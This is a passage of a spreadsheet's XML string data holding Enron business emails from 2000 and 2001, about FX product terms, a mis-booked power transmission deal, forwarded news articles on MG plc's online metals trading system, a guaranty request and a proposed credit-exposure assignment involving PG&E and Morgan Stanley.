  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
  &lt;http://www.businessweek.com/common_images/bw_mcgrawhilllogo.gif&gt;Copyright 2001, by The McGraw-Hill Companies Inc. All rights reserved._x000D_
Terms of Use &lt;http://www.businessweek.com/cgi-bin/redirect?url=%2Fcopyrt.htm&gt; | Privacy Policy &lt;http://www.businessweek.com/cgi-bin/redirect?url=%2Fprivacy.htm&gt;_x000D_
_x000D_
	</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 03:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GTC for External FX products</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, we are trying to have everything completed so we could launch this _x000D_
product to go live on April 9th. Sara has already given us the approval on _x000D_
the GTCs for these FX products for external counterparties. The products do _x000D_
not have names as yet, but the FX team is working on it. Can you go ahead and _x000D_
review the GTC's for these products in the mean time and I will contact you _x000D_
with the names of the products as soon as we get them._x000D_
Thanks_x000D_
jr_x000D_
_x000D_
---------------------- Forwarded by Justin Rostant/HOU/ECT on 03/29/2001 _x000D_
04:49 PM ---------------------------_x000D_
From: Sara Shackleton on 03/29/2001 10:09 AM_x000D_
To: William Stuart/HOU/ECT@ECT, Justin Rostant/HOU/ECT@ECT, Susan _x000D_
Musch/Enron@EnronXGate_x000D_
cc:  _x000D_
Subject: attachments_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 03:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 505750</t>
  </si>
  <si>
    <t xml:space="preserve">A Real Time guy mistakenly sold to Coral instead of using their established _x000D_
PGE transmission deal. 505750 has been killed and the transmission has been _x000D_
re-scheduled under deal #146517. _x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
01/26/2001 09:50 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 505750_x000D_
_x000D_
Please check this deal.  It is booked under Coral for transmission.  We don't _x000D_
have a transmission contract with Coral and we don't usually sell _x000D_
transmission.  Let me know._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'justin.boyd@enron.com', 'michael.brown@enron.com'})</t>
  </si>
  <si>
    <t>MG plc</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 06/26/2000 05:16 PM -----_x000D_
_x000D_
	Travis McCullough_x000D_
	06/23/2000 06:03 PM_x000D_
		 _x000D_
		 To: shodgson@velaw.com_x000D_
		 cc: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 Subject: MG plc_x000D_
_x000D_
Steve:_x000D_
_x000D_
Attached is a series of press releases by MG Plc regarding their metals _x000D_
website, the first of which was launched on or about October 4, 1999._x000D_
_x000D_
I also have a message in to the attorneys at Enron that worked closely on the _x000D_
acquisition, but one of our commercial people understands the site to be an _x000D_
on-line brokerage system (like E*Trade) -- the press release on the launch of _x000D_
the system (at the bottom of this message) indicates that the site is an LME _x000D_
trading and execution system.  I'll forward over any other information I can _x000D_
find.     _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
USA: Metal exchanges hold firm as Web trading blooms._x000D_
_x000D_
06/22/2000_x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2000. _x000D_
_x000D_
NEW YORK, June 22 (Reuters) - The world's two largest metal exchanges said _x000D_
they will retain their roles despite the rapid expansion in Internet trading _x000D_
and as another major metal dealer announced the launch of an online trading _x000D_
system on Thursday. _x000D_
The London Metal Exchange (LME) is carefully planning its introduction of _x000D_
electronic trading in the second-half of this year and refuses to be _x000D_
"spooked" by those "urging action, any action, as long as it is now," _x000D_
Jonathan Haslam, LME director of corporate affairs, told a conference in New _x000D_
York._x000D_
His comments were echoed by Patrick Thompson, president of the New York _x000D_
Mercantile Exchange (NYMEX), who said it would be very difficult for the new _x000D_
online trading systems to bring together those elements that underpinned the _x000D_
success of the traditional exchanges. _x000D_
Thompson told the Metal Bulletin E-Commerce 2000 conference that said these _x000D_
elements included the handling of counterparty credit risk, the clearing of _x000D_
trades and the existing pools of liquidity provided by the different segments _x000D_
of the metals market which use the exchanges. _x000D_
Haslam compared the LME's trading turnover averaging $8 billion a day with _x000D_
the around $1.5 billion a day traded online by U.S. energy giant Enron Corp. _x000D_
. _x000D_
Enron's expansion in the e-commerce market was earlier referred to by Thomas _x000D_
Pimpinelli, senior vice president of MG London Inc. part of U.K.-based metals _x000D_
trading group MG Plc . In May, MG agreed to a 300 pence per share cash offer _x000D_
from Enron. _x000D_
Pimpinelli said MG's own MITS online metals trading system, launched in _x000D_
October 1999, has to date processed over 135,000 contracts with an overall _x000D_
value of $5.25 billion. _x000D_
He told the meeting that between 65 percent to 80 percent of MG's order flow, _x000D_
mostly from small metals clients, was now done over the Internet. _x000D_
Pimpinelli said the success of its "Market Maker" real-time trading facility _x000D_
within MITS for tonnages of up to a 1,000 tonnes, had encouraged the company _x000D_
to create a new product for the Managed Futures industry called "CTA Trader." _x000D_
The product will differ from Market Maker in that the customer can trade _x000D_
larger volumes, request a volume quote on-line, and then have the facility to _x000D_
book the resulting live on-line quote. _x000D_
"Once executed the customers will need to breakdown or allocate the _x000D_
transaction to his individual or multiple pre-approved clearing houses by way _x000D_
of a dropdown menu," he said. Pimpinelli added that CTA Trader would be _x000D_
launched in the next month or so. _x000D_
Sharing a platform with Pimpinelli, Karl Hackert, head of e-commerce at U.S. _x000D_
trader Koch Metals, announced the impending launch of his company's own _x000D_
online metals trading system by the end of June. Koch metals is a unit of _x000D_
Koch Industries Inc. . _x000D_
Hackert said the issue of the LME's daily forward prices valuation at 5.30 _x000D_
p.m. in London, meant that the level of these quotes wasn't clear during the _x000D_
rest of the trading day. Under the new Koch system prices will be updated _x000D_
every five seconds and out to 27 months. _x000D_
"Koch are the first to do this (offer near real-time forward prices) and it _x000D_
is a big step forward in terms of market transparency," he said. _x000D_
Hackert said Koch had built its system to better communicate with its clients _x000D_
and it did not intend to go into direct competition with the LME. _x000D_
"Making a generic mass system? I don't think that's the business we're in," _x000D_
he said. _x000D_
((Steve Hays, New York Commodity desk, 212 8591640))._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
UK: UPDATE 2-MG to widen access to online metals trade._x000D_
By Andy Blamey_x000D_
_x000D_
06/13/2000_x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2000. _x000D_
_x000D_
LONDON, June 13 (Reuters) - U.K.-based metals trading group MG plc said on _x000D_
Tuesday it would broaden access to its online metals trading systems as the _x000D_
battle for web pre-eminence comes to the boil. _x000D_
MG, one of the world's leading metals traders, said it would allow London _x000D_
Metal Exchance clearing members to use the system, which had been restricted _x000D_
to clients, with immediate effect._x000D_
The move comes in response to strong demand for access to the system, an MG _x000D_
spokesman said. MG has so far signed up 14 Category One (ring dealing) and _x000D_
Category Two (associate broker clearing) members of the LME. _x000D_
"We have decided to broaden the availability of Market Maker following the _x000D_
rapid increase in volumes and substantial uptake by both existing and new _x000D_
clients," said Michael Hutchinson, CEO of MG's Financial Services Division in _x000D_
a statement. _x000D_
"We are confident that we have an online product which will meet demand from _x000D_
other clearing members of the LME." _x000D_
The wider access to MG's system need not necessarily pose a threat to other _x000D_
online marketplaces, said Gavin Gross, head of LME metals at brokerage _x000D_
Spectron Futures Ltd. Spectron plans to launch online systems to trade London _x000D_
Metal Exchange contracts later this month. _x000D_
"They're very different models. MG is a principal in the market, so you're _x000D_
looking at MG prices only. Spectron is neutral, we're just providing a _x000D_
platform. It's a multilateral system with lots of dealers interacting with _x000D_
each other," Gross said. _x000D_
"The two can exist side by side," he added. _x000D_
Over 80 percent of MG's clients are now using its online services, the _x000D_
company said. Market Maker turnover stood at 3,000 contracts in May - a _x000D_
growth rate of approximately 50 percent per month since the launch in January _x000D_
of this year. _x000D_
Online deals still make up a low proportion of MG's total trading turnover, _x000D_
however. _x000D_
MG's MITS system launched in October 1999 and has now processed over 95,000 _x000D_
contracts with a dollar value in excess of $3.8 billion and a monthly _x000D_
turnover in excess of $1 billion. _x000D_
"We are using it (MITS) for the one or two lot small stop orders that you _x000D_
previously missed and had the customer ringing up asking if we had done his _x000D_
trade," said one user of an MG system at an ABCM. _x000D_
However, it would appear that MG is now limiting the size of the orders it _x000D_
will accept on MITS from its non-customers, he said. _x000D_
Metals e-commerce sites are proliferating, but they follow no single business _x000D_
model. There are portals run by single principals quoting their own prices; _x000D_
intranets where big market players are cooperating; different rules for _x000D_
access; and a wide variation in revenue models, the key to profitability. _x000D_
The company announced in March it had joined Internet Capital Group and _x000D_
Safeguard International Fund to form the EMETRA joint venture, in which MG _x000D_
has a 25 percent stake. _x000D_
EMETRA is building a worldwide business-to-business (B2B) e-commerce _x000D_
marketplace for the non-ferrous metals markets, including physical trading a _x000D_
futures and options contracts. _x000D_
MG contributed its Internet systems to EMETRA and continues to use MITS and _x000D_
Market Maker under a licence agreement with EMETRA. _x000D_
In May, MG agreed a 300 pence per share cash offer from U.S. energy and _x000D_
communications group Enron, a major player in the e-commerce market through _x000D_
Enron Online, which trades around 840 products in some 13 countries in 11 _x000D_
currencies._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
US Enron Bid For MG May Signal End Of LME Outcry Trading_x000D_
By Adam Aljewicz_x000D_
_x000D_
05/23/2000_x000D_
Dow Jones International News _x000D_
(Copyright (c) 2000, Dow Jones &amp; Company, Inc.) _x000D_
_x000D_
LONDON -(Dow Jones)- Enron's (ENE) offer to buy London Metal Exchange ring _x000D_
dealing firm MG PLC (U.MGA) could bring the exchange one step closer to _x000D_
ending open outcry trading, dealers say. _x000D_
Both the U.S.-based energy and communications group, and MG have pioneered _x000D_
electronic trading and are widely seen as being among the only participants _x000D_
on the LME trading floor capable of making the transition to on-screen _x000D_
trading. The LME, meanwhile, is also seeking to introduce on-screen _x000D_
technology for out-of-ring trading sessions._x000D_
"We're not surprised in the least to see this tie-up take place," an analyst _x000D_
at Deutsche Bank told Dow Jones Newswires. "Everything we see now is pointing _x000D_
toward the removal of the ring-dealing sessions, and it's just a matter of _x000D_
time before it ends all together," she said. _x000D_
MG's chairman Tom McKeever said the company won't abandon its position as an _x000D_
LME ring dealing member, but market watchers doubt whether - after 123 years _x000D_
- open outcry can survive on the LME as fast-paced technological change _x000D_
sweeps through the industry. _x000D_
Enron has made a GBP300 million cash offer for London-based MG in a bid to _x000D_
gain a foothold in the $120 billion-a-year world metal market. The U.S. _x000D_
company already has a substantial market share in natural gas and electricity _x000D_
markets, and with its electronic trading platform, Enron On Line, it has _x000D_
already executed more than 110,000 transactions valued at over $45 billion _x000D_
since its launch in November. _x000D_
"It's not surprising to see a strategic link up between an energy and metals _x000D_
company because they're both very big in industrial commodities," said an _x000D_
analyst for a U.S.-based commission house. "I think it's almost inevitable _x000D_
that open outcry trading will be a thing of the past," he said. _x000D_
Enron's move into the metals market has also been linked to the LME's growing _x000D_
interest in initiating an automated trading system, and has lead some market _x000D_
watchers to suggest that the Enron-MG tie-up will lead to greater _x000D_
consolidation among LME members. _x000D_
Metals trading companies and brokerage firms are struggling to survive as _x000D_
profits wane amid the growth of banks and funds in the metals trading arena. _x000D_
"Out of the 13 ring dealing firms on the LME, I think only six will be able _x000D_
to make the transition to on-screen trading," said a dealer for a _x000D_
London-based bank. "And that's only because we have a banking background," he _x000D_
said. _x000D_
The six cited are MG, the metals trading arm of the Bank of Nova Scotia, _x000D_
U.S.-based brokerage Refco Inc., Credit Lyonnais Rouse, Barclays Capital and _x000D_
Fimat Metals. _x000D_
The LME's existing system involves the trading of eight metals within its _x000D_
circular trading floor. Around 35% of the LME's trading takes place there, _x000D_
but this figure could drop if the LME decides to abandon open outcry, traders _x000D_
say. "Market participants will have to decide whether to use the ring _x000D_
or go through the Internet," said a dealer. "That's how it will start_x000D_
and will probably lead to the trading floor being bypassed_x000D_
altogether." _x000D_
_x000D_
MG, which was spun off from Germany's Metallgesellschaft last September, has _x000D_
pioneered the use of metals trading on the Internet with the launch in _x000D_
October of MITS and MARKET MAKER, its Internet trading system. _x000D_
MG is the second-largest physical merchant of copper, nickel and aluminum in _x000D_
Europe after Switzerland's Glencore. _x000D_
"When profit margins are narrowing and so many LME companies are looking more _x000D_
and more uncertain about their future, MG (is) arguably the pick of the crop _x000D_
in terms of stability and profitably," said a dealer for a North _x000D_
American-owned ring dealing firm. LME Considers Screen Trading _x000D_
_x000D_
Separately, the LME has considered a series of moves that would also hasten _x000D_
the demise of open outcry trading. _x000D_
It has repeatedly said it is looking to develop an electronic screen-trading _x000D_
system for use in out of ring trading sessions, and that it plans to press _x000D_
ahead with changes to its ownership structure by demutualizing in favor of _x000D_
becoming a shareholder entity. _x000D_
"We've made very clear that there are proposals for consequential changes to _x000D_
the LME's governance," said Jonathan Haslam, director of corporate affairs at _x000D_
the LME. _x000D_
The LME set up an eight-member committee in February which comprised four _x000D_
ring dealing members and four associate broker members to map out a strategy _x000D_
for the implementation of new technology. _x000D_
However, it has so far declined to comment on how this technology will be _x000D_
executed, although Haslam has said the LME is looking at around 20 companies _x000D_
with the requisite knowledge and background to provide and implement the _x000D_
on-screen technology. _x000D_
"We said we would look into setting up an interoffice screen trading system _x000D_
but we have yet to come to a decision on who our technical partner will be," _x000D_
he said. "But we should come to a decision in a couple of weeks." _x000D_
-By Adam Aljewicz; 44-20-7842-9353; adam.aljewicz@dowjones.com -0- 23/05/00 _x000D_
12-56G_x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
Financial Post_x000D_
MG exceeds $1B Internet trade target_x000D_
Martin Hayes_x000D_
Reuters_x000D_
_x000D_
04/05/2000_x000D_
National Post _x000D_
National _x000D_
!@SERIES=_x000D_
C14_x000D_
(c) Copyright 2000 Financial Post from National Post (formerly The Financial _x000D_
Post Company). All rights reserved. _x000D_
_x000D_
LONDON - International metals trader MG PLC said yesterday that business on _x000D_
its six-month old Internet trading systems had comfortably exceeded its _x000D_
transaction value target of $1-billion (all figures in U.S. dollars). _x000D_
"We are at $1.5-billion as of this morning. We are are very pleased with the _x000D_
progress and the rate of growth," said Tom McKeever, MG chairman._x000D_
He noted that online trading in metals is seen growing rapidly, according to _x000D_
a recent study by Anderson Consulting. Just 2% to 3% of business in the _x000D_
non-ferrous industry is currently conducted online, while in three to five _x000D_
years it will be 40% to 60%, he said. _x000D_
Since the launch in October, volumes on MG's internet systems, known as MITS _x000D_
and MARKET MAKER, have increased by 50% a month and cumulatively exceed _x000D_
30,000 contracts now. _x000D_
MG said it had also gained customers as its systems are the only ones that _x000D_
currently offer online trading. "When we launched the system, we had requests _x000D_
from many new customers to register. We registered quite a few new customers. _x000D_
It is beyond our expectations," Mr. McKeever added. _x000D_
The increase in on-line business on MITS has been seen round the clock as _x000D_
customers have become increasingly comfortable with the system. _x000D_
"We were the first to start the system. It has been late coming to the metals _x000D_
business, but we think it is good for the industry," he said. _x000D_
Last month, MG announced it had joined Internet Capital Group and Safeguard _x000D_
International Fund to form an eMetra joint venture in which it has a 25% _x000D_
stake._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
MG PLC - Trading Update_x000D_
_x000D_
04/04/2000_x000D_
Regulatory News Service _x000D_
Copyright (C) 2000 Regulatory News Service; Source: World Reporter (TM) _x000D_
_x000D_
MG INTERNET TRADING UPDATE _x000D_
MG announces that in the first six months of trading on its Internet systems, _x000D_
MITS and MARKET MAKER, it has surpassed its target of US $1 billion in value _x000D_
of transactions. The volume of transactions has been increasing by 50% a _x000D_
month since October and cumulatively exceeds 30,000 contracts._x000D_
The trading systems have attracted new customers as well as MG's existing _x000D_
customers because it is the only system currently available that offers them _x000D_
an on-line LME trading and execution service. _x000D_
The launch of MITS was announced in October 1999 by MG. In February, MG _x000D_
announced that it had joined with Internet Capital Group and Safeguard _x000D_
International Fund to form the eMetra joint venture, in which MG has a 25% _x000D_
stake. eMetra is in the process of establishing a worldwide _x000D_
business-to-business (B2B) e-commerce marketplace for the non-ferrous metals _x000D_
markets, including physical trading and the trading of futures and options _x000D_
contracts. MG contributed its Internet systems to eMetra and continues to use _x000D_
MITS and MARKET MAKER under a licence agreement with eMetra. Once eMetra is _x000D_
fully operational later this year, MG will become a user of eMetra's _x000D_
platform. _x000D_
Michael Hutchinson, Joint Chief Executive of MG plc, said: "We are delighted _x000D_
that so many customers to date have transferred their business on to the _x000D_
Internet - we see this trend as increasing significantly in the coming _x000D_
months. It is proving attractive to new customers and enables us to give our _x000D_
existing customers a more efficient service." _x000D_
For further information: _x000D_
Michael Hutchinson, Joint Chief Executive MG plc Tel: 0171 488 2244 _x000D_
Nick Denton/James Longfield Hogarth Partnership Tel: 0171 357 9477_x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
City: MG plans to launch metals website_x000D_
James Ashton_x000D_
_x000D_
02/11/2000_x000D_
The Daily Telegraph _x000D_
Copyright (C) 2000 The Daily Telegraph; Source: World Reporter (TM) _x000D_
_x000D_
MG, the international metals trader, yesterday unveiled plans to develop an _x000D_
internet marketplace for trading non-ferrous metals, in direct competition _x000D_
with the London Metals Exchange (LME). _x000D_
The joint venture with the Internet Capital Group (ICG) and private equity _x000D_
fund Safeguard International will establish a worldwide business-to-business _x000D_
e-commerce platform for non-ferrous metals. This will include physical _x000D_
trading and the trading of options and futures contracts._x000D_
MG shares soared 140 1/2 to 337 1/2 p. _x000D_
"We didn't go into this venture intending to put anyone out of business," _x000D_
said chairman Thomas McKeever. _x000D_
He added that the as-yet-unnamed new venture would attract new clients, _x000D_
particularly small and medium-sized companies who regard conventional LME _x000D_
trade as too costly and complex. _x000D_
He said he also hoped to open up the derivatives market to smaller players. _x000D_
"When you develop a global marketplace you attract, presumably, most industry _x000D_
participants," he added. _x000D_
Safeguard and Nasdaq-listed ICG, which already has stakes in more than 50 _x000D_
companies offering online trading in sectors such as industrial chemicals, _x000D_
plastics and cattle, have invested a total of $25 million in the venture, _x000D_
taking 30 and 45pc stakes respectively. _x000D_
MG, the world's largest copper merchant, will hold an initial 25pc, with an _x000D_
option to increase that to 50pc within eight months. The company, which _x000D_
floated last September at 205p, after being spun off from German engineering _x000D_
group Metallgesellschaft, will continue to operate its internet trading _x000D_
system Mits for existing customers. It began live internet dealing of _x000D_
aluminium and copper in January._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
MG expects MITS to be a hit._x000D_
CHRISTIAN KOHL_x000D_
_x000D_
10/14/1999_x000D_
American Metal Market _x000D_
8_x000D_
Copyright 1999 Information Access Company. All rights reserved. COPYRIGHT _x000D_
1999 Cahners Publishing Company _x000D_
_x000D_
DUSSELDORF -- Only one week after London Metal Exchange trader _x000D_
Metallgesellschaft Ltd. launched its web site system that allows trade _x000D_
execution services on the Internet, it is optimistic that the concept will be _x000D_
a hit. _x000D_
"It's been quite extraordinary," said Alex Health, MG's director of _x000D_
e-commerce systems. "We've had something like 300 reactions so far from both _x000D_
existing customer companies as well as new ones logging on." He said that the _x000D_
non-customers entering MG'S site (www.mgltd.co.uk) ranged from large groups _x000D_
MG had wanted to make contact with for a longtime to small companies that _x000D_
Heath said he'd never heard of. _x000D_
_x000D_
"Of course, it's LME Week now, so we are busy with socializing and making _x000D_
contacts there before we can reply to the requests we've received," Heath _x000D_
said. He noted that LME Week was one important factor in launching the _x000D_
Metallgesellschaft Internet Trading System (MITS) in time to display it at _x000D_
Broker's House by Tuesday evening. MG Plc's recent floatation also provided a _x000D_
major motivation for the project to raise MG's profile, he said: _x000D_
Heath said that MITS has not had an immediate effect on trading volumes _x000D_
beyond the regular market, activity, but 70. customers so far had used the _x000D_
facility for deals. He added that MITS might soon contribute to MG's customer _x000D_
base, but it would take some time for new parties attracted to the site to be _x000D_
registered as regular customers. _x000D_
At the beginning of LME Week, few LME trading companies were prepared to _x000D_
comment on MITS and its possible effect on metals trading. MG's presentations _x000D_
at the LME event were aimed at providing a clearer picture. "I'd be extremely _x000D_
disappointed if the idea didn't spread as the Internet will inevitably be a _x000D_
big factor in trading," Heath said. He noted that MG put itself under _x000D_
pressure by moving before some other company with a similar _x000D_
project-in-the-making could enter the scene. _x000D_
"Speed is a definite factor in the Internet, and we can claim to be leading _x000D_
into the new millennium in this regard," he said, adding that MG received _x000D_
many "flattering comments" from brokers. _x000D_
Peter Sellars of Barclays Bank Plc conceded that "certainly they got there _x000D_
before anybody else" but added that "they won't have very much of a lead _x000D_
time." He said that the Internet was going to be the way of the future and _x000D_
that Barclays was making similar preparations, but so far offered a web site _x000D_
order trading system only for non-metallic futures. He noted, however, that _x000D_
web site trading would not satisfy all requirements. "It's great for the _x000D_
small bread-and-butter stuff, but for long-term contracts it's gonna be _x000D_
tricky, isn't it," Sellars said. _x000D_
A spokesman at Triland Metals Ltd., another LME member, questioned whether MG _x000D_
was really embracing technology or vice versa. "It could be a gimmick for _x000D_
customers, and it doesn't really mean they're successful with enlarging their _x000D_
customer base," he said. He noted that people were always interested in _x000D_
coming close but weren't necessarily keen on taking the final step. He said _x000D_
that Triland had no immediate plans for a similar service and that it was _x000D_
confining its web site plans to statistics and other basic information. "They _x000D_
jumped the gun to a certain extent, but we'll have to see if it's successful _x000D_
or not."_x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
European &amp; Emerging Markets_x000D_
MG Launches First Internet Metals Trade Service_x000D_
A Wall Street Journal Europe Roundup_x000D_
_x000D_
10/05/1999_x000D_
The Wall Street Journal Europe _x000D_
16_x000D_
(Copyright (c) 1999, Dow Jones &amp; Company, Inc.) _x000D_
_x000D_
LONDON -- MG PLC has launched the first Internet-based metals futures trading _x000D_
system. _x000D_
MG, which went public on the London Stock Exchange in September, offers a _x000D_
full trading and execution service on the London Metals Exchange._x000D_
The system, which is called MITS, will be supported by a real-time price _x000D_
screen for all the metals traded on the LME and includes a multi-currency _x000D_
facility. The LME trades copper, aluminium, lead, zinc, nickel, tin, silver _x000D_
and aluminium alloy. _x000D_
In addition, customers can listen to a direct voice commentary from the floor _x000D_
of the LME during trading sessions. _x000D_
Technical analysis and market research on all LME metals is available and _x000D_
regularly updated. Customers can also access their position and valuation _x000D_
statements over a secure encrypted link to the firm's computer system. _x000D_
MITS can only be accessed by registered customers of Metallgesellsc haft _x000D_
Limited, MG's LME brokerage and trading arm. _x000D_
"It is a customer service and it is live now to our registered customers," _x000D_
said Michael Hutchinson, MG's joint chief executive. _x000D_
MG's customers will also be able to listen to a direct-voice commentary from _x000D_
the floor of the LME during trading sessions. They will also be able to _x000D_
access their position and valuation statements over a secure encrypted link _x000D_
to MG's computer system, MG said. _x000D_
The LME is the world's largest non-ferrous metals market with 14 ring-dealing _x000D_
members who participate in the twice-daily important open-outcry sessions. _x000D_
The LME settlement prices for metals which are realized in the official _x000D_
morning trading sessions are the benchmark reference prices for most of the _x000D_
world's physical contracts. _x000D_
Outside the open-outcry sessions, LME business takes place over a 24-hour _x000D_
period via an inter-office telephone market. _x000D_
"We are always interested in any new uses of technology. We will watch this _x000D_
with interest," an LME spokeswoman said. _x000D_
MG said it intended to develop its website to eventually include real-time _x000D_
physical metal prices and premiums. _x000D_
MG's system is the latest in a series of Internet commodity trading systems._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
?_x000D_
_x000D_
MG PLC - Re Internet Trading System_x000D_
_x000D_
10/04/1999_x000D_
Regulatory News Service _x000D_
Copyright (C) 1999 Regulatory News Service; Source: World Reporter (TM) _x000D_
_x000D_
Introduction of the first Internet LME trading system _x000D_
MG plc, the international metals trading business which floated on the London _x000D_
Stock Exchange in September 1999, today announces the launch of the world's _x000D_
first Internet based metals futures trading system, offering a full LME _x000D_
trading and execution service. The new site can be accessed at _x000D_
www.mgltd.co.uk and is designed to make dealing more efficient and more _x000D_
readily accessible to customers of Metallgesellschaft Limited, MG plc's LME _x000D_
brokerage and trading arm._x000D_
The system, which is called MITS, will be supported by a real time price _x000D_
screen for all the metals traded on the LME and includes a multi-currency _x000D_
facility. In addition customers can listen to a direct voice commentary from _x000D_
the floor of the LME during trading sessions. Technical analysis and market _x000D_
research on all LME metals is available and regularly updated. Customers can _x000D_
also access their position and valuation statements over a secure encrypted _x000D_
link to the firm's computer system. _x000D_
MITS can only be accessed by registered customers of Metallgesellschaft _x000D_
Limited. Prospective customers can view a demonstration programme at the _x000D_
website. The system will complement the company's traditional brokerage _x000D_
activities. _x000D_
Michael Hutchinson, Joint Chief Executive of MG plc, said today: _x000D_
"The development of MITS will make our business more efficient and make _x000D_
dealing for customers more accessible and cost-effective. Being the first LME _x000D_
broker to provide a comprehensive E-commerce system should further improve _x000D_
our competitive advantage, enabling us to reach all of our brokerage _x000D_
customers with timely and accurate information." _x000D_
MG plc intends to develop a site for its merchanting business, providing _x000D_
real-time physical metal prices, premiums and other related information. _x000D_
For further information: _x000D_
Michael Hutchinson, Joint Chief Executive MG plc Tel: 0171 488 2244 _x000D_
Nick Denton/James Longfield Hogarth Partnership Tel: 0171 357 9477 _x000D_
Background on MG plc _x000D_
MG plc is a leading independent international metals trading business _x000D_
providing services to the global metals industry. The group is organised into _x000D_
two operating divisions: Merchanting and Financial Services. The Merchanting _x000D_
division is buys, sells, stores, ships and trades non-ferrous metals as a _x000D_
principal with producers and consumers. It is the world's leading copper _x000D_
merchant, one of the top three merchants of copper concentrates and nickel _x000D_
and a leading European merchant of recycled metal. The Financial Services _x000D_
division is a leading metals broker and market-maker. It is a leading LME _x000D_
member and operates one of the leading LME metals warehousing businesses. MG _x000D_
is headquartered in London, and employs 320 people in 14 countries around the _x000D_
world. It was listed on the London Stock Exchange in September 1999 and has a _x000D_
current market capitalisation of some #175 million._x000D_
_x000D_
_x000D_
.............................................................................._x000D_
....................................................... _x000D_
_x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 08:24:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Corp. Guaranty - Inland Paperboard and Packing, Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Cindy!_x000D_
_x000D_
Attached are a memo requesting the referenced Enron Corp. guaranty, together with a form of Certificate of Incumbency.  Please let me know when the documents are ready and I'll send someone to pick them up._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
_x000D_
_x000D_
		 	 </t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Morgan Stanley Power Desk</t>
  </si>
  <si>
    <t xml:space="preserve">Let's get together on this and have a conference call.  Thanks.  _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  William S Bradford                           12/27/2000 05:12 PM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: Don Black/HOU/EES@EES, Tracy Ngo/PDX/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT _x000D_
Subject: Morgan Stanley Power Desk_x000D_
_x000D_
Jeff,_x000D_
_x000D_
It is my understanding that you will be speaking with Simon Greenshields at _x000D_
Morgan Stanley ("MS") tomorrow.  I have outlined the facts as I know them in _x000D_
regards to our position with PG&amp;E._x000D_
_x000D_
Enron Energy Marketing Corporation ("EEMC") has four outstanding purchases _x000D_
from PG&amp;E Energy Trading - Power LP ("PG&amp;E").  One of these transactions PG&amp;E _x000D_
has backed with a purchase from MS.  We have not been disclosed exact terms _x000D_
of the transaction PG&amp;E has with MS.  The terms of our transaction with PG&amp;E _x000D_
are as follows:_x000D_
_x000D_
EEMC purchases 100MW around the clock 1/1/2001 to 12/31/2002 from PG&amp;E with _x000D_
delivery point of SP15 at price of $29/Mwh_x000D_
_x000D_
This transaction is currently in-the-money $130mm._x000D_
_x000D_
We are proposing to assign EEMC's position to EPMI and then EPMI would agree _x000D_
to take assignment from PG&amp;E its position with MS in return for unwinding _x000D_
EPMI's transaction with PG&amp;E.  Our net book value would remain unchanged but _x000D_
we would transfer credit exposure to MS rather than PG&amp;E._x000D_
_x000D_
It is my understanding that MS is currently posting margin to PG&amp;E above some _x000D_
threshold within the Master contract between PG&amp;E and MS.  With the _x000D_
assignment EPMI would assume the contract under its Master agreement.  The _x000D_
current agreement has no executed margining agreements but we have been _x000D_
exchanging margin above a $15mm bilateral threshold.  Enron would be willing _x000D_
to either not require collateral on the deal or take the collateral under the _x000D_
current terms negotiated but not yet documented._x000D_
_x000D_
If we choose to take collateral, MS can post either cash or letters of _x000D_
credit.  If they post cash, EPMI contractually can invest those funds as we _x000D_
see fit but will be required to pay interest at the Fed Funds interest rate._x000D_
_x000D_
Give me a call if you have any questions._x000D_
_x000D_
Bill_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 02:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DG case</t>
  </si>
  <si>
